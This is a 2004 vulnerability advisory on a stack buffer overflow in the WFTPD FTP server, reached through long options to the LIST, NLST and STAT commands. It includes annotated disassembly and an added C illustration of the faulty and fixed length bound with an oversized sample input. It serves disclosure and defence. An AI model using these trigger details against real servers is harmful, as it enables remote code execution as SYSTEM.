Critical WFTPD buffer overflow vulnerability


Date: Sat, 28 Feb 2004 21:52:33 +0000
From: axl rose <[email protected]>
To: [email protected], [email protected]
Subject: Critical WFTPD buffer overflow vulnerability
Cc: [email protected]


Name of Advisory: Critical WFTPD buffer overflow vulnerability
Severity:         Critical
Discoverer:       axl ([email protected])
Released:         Today
Vendor Notified:  Today

WFTPD who? what? when?
~~~~~~~~~~~~~~~~~~~~~~
Vendor quote: "WFTPD Server has been a leading FTP server for Windows since 
it was released in 1993. Its stability and security have long been relied 
on by technology companies, educational institutions, government 
departments, individuals and others, to provide a secure FTP site."

Tested versions
~~~~~~~~~~~~~~~
- WFTPD Pro Server 3.21 Release 1 (trial) (latest version)
- WFTPD Pro Server 3.20 Release 2 (trial)
- WFTPD Server 3.21 Release 1 (trial) (latest version)
- WFTPD Server 3.10 Release 1 (trial)

All tested versions are vulnerable. Other versions may also be vulnerable.

Overview
~~~~~~~~
There's a stack-based buffer overflow vulnerability that a remote attacker 
can exploit to execute arbitrary code on the remote system running the 
vulnerable WFTPD server software. For WFTPD Pro Server, the code will 
execute as SYSTEM; for WFTPD Server, the code will execute as the user 
who started the server.

Vulnerability details
~~~~~~~~~~~~~~~~~~~~~
The vulnerable FTP commands are LIST, NLST, and STAT. The user must be 
logged in as any user unless the Secure option in the registry is 0.

There's special-case code that checks whether the first argument's first 
character is '-'. If it is, and a ' ' character appears at some later 
position, the following vulnerable code runs (WFTPD Pro trial v3.21.1.1). 
For the programming-challenged, I've added comments:

004034B8 MOV  EAX,[EBP+8]    ; strchr(userbuf, ' ')
004034BB SUB  EAX,ESI
004034BD DEC  EAX            ; num bytes to copy
004034BE CMP  EAX,EDI        ; (below) jump if num bytes to copy
004034C0 JLE  SHORT 004034C4 ; is <= max_len - 2
004034C2 MOV  EDI,EAX
004034C4 PUSH EDI            ; max(max_len - 2, num bytes to copy)
004034C5 INC  ESI            ; don't copy '-'
004034C6 PUSH ESI            ; &userbuf[1]
004034C7 PUSH EBX            ; &dest[1] on the stack
004034C8 CALL memcpy

Anything between the first '-' char and the first ' ' char is copied into 
the string. This string only has room for 31 characters and a terminating 
null byte. Obviously, the programmer mistakenly used max() instead of min().
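As an added illustration (not code from the advisory or from WFTPD), the length computation from the disassembly above rewritten in C: the max() bound as shipped beside the min() bound a fix needs, followed by a copy routine that honours the 32-byte destination. OPT_BUF_SIZE, LONG_OPTION and the function names are assumptions made for this example.

```c
#include <string.h>

#define OPT_BUF_SIZE 32                 /* 31 characters plus NUL, as in WFTPD */
#define OPT_MAX_COPY (OPT_BUF_SIZE - 2) /* the "max_len - 2" in the disassembly */

/* Constructed sample: 40 option bytes between '-' and the first ' '. */
const char LONG_OPTION[] = "-" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" " /pub";

/* Bytes between the leading '-' and the first ' ' (the SUB/DEC pair).
 * Returns -1 when the special-case path in the advisory is not taken. */
static long option_span(const char *userbuf) {
    const char *space = userbuf[0] == '-' ? strchr(userbuf, ' ') : NULL;
    if (space == NULL) return -1;
    return (long)(space - userbuf) - 1;
}

/* Bound as shipped: JLE skips "MOV EDI,EAX" only when span <= limit, so the
 * length pushed to memcpy is max(limit, span) and a long span passes unchanged. */
long buggy_copy_len(const char *userbuf) {
    long span = option_span(userbuf);
    if (span < 0) return -1;
    return span > OPT_MAX_COPY ? span : OPT_MAX_COPY;
}

/* Corrected bound: min(limit, span), so the copy never exceeds the room left. */
long fixed_copy_len(const char *userbuf) {
    long span = option_span(userbuf);
    if (span < 0) return -1;
    return span < OPT_MAX_COPY ? span : OPT_MAX_COPY;
}

/* Hardened copy with the original layout: dest[0] keeps '-', the option text
 * follows at dest[1], and the result is always NUL-terminated. Returns the
 * number of option bytes copied, or -1 if the path does not apply. */
long copy_list_option(const char *userbuf, char dest[OPT_BUF_SIZE]) {
    long n = fixed_copy_len(userbuf);
    if (n < 0) { dest[0] = '\0'; return -1; }
    dest[0] = '-';
    memcpy(dest + 1, userbuf + 1, (size_t)n);
    dest[1 + n] = '\0';
    return n;
}

/* Total string length after a hardened copy, for checking the bound. */
size_t copied_option_strlen(const char *userbuf) {
    char dest[OPT_BUF_SIZE];
    copy_list_option(userbuf, dest);
    return strlen(dest);
}
```

With the shipped bound even a two-character option such as "-la" yields a 30-byte copy, and a 40-byte option is copied in full; the corrected bound caps both at the 30 bytes that actually fit.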

Exploit
~~~~~~~
See attached source code.


